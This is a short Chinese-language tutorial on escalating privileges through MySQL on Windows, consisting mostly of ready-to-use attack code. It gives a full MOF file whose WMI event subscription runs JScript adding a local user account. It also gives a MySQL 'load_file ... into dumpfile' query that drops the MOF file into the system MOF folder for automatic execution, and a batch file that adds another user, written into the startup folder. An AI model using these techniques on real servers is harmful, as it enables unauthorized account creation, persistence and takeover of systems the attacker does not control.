提權——MySQL mof提權及啟動項提權簡述

Mof提權的利用方法

将代碼儲存為.mof檔案

#pragma namespace("\\\\.\\root\\subscription") 

instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 

instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")"; 
}; 

instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
}; 
           

在mysql中執行下面，通過查詢将檔案導入

select load_file(’.mof檔案的路徑’) into dumpfile ‘c:/windows/system32/wbem/mof/.mof(你生成的檔案名)’;

導入成功後系統會自動運作該檔案。

啟動項提權

@echo
net user dodo dodo /add
           

将代碼儲存儲存成 .bat檔案

通過查詢将檔案導入

select load_file(’.bat檔案的路徑’) into dumpfile ‘該系統的啟動項目錄’;

當系統重新開機時 就會生效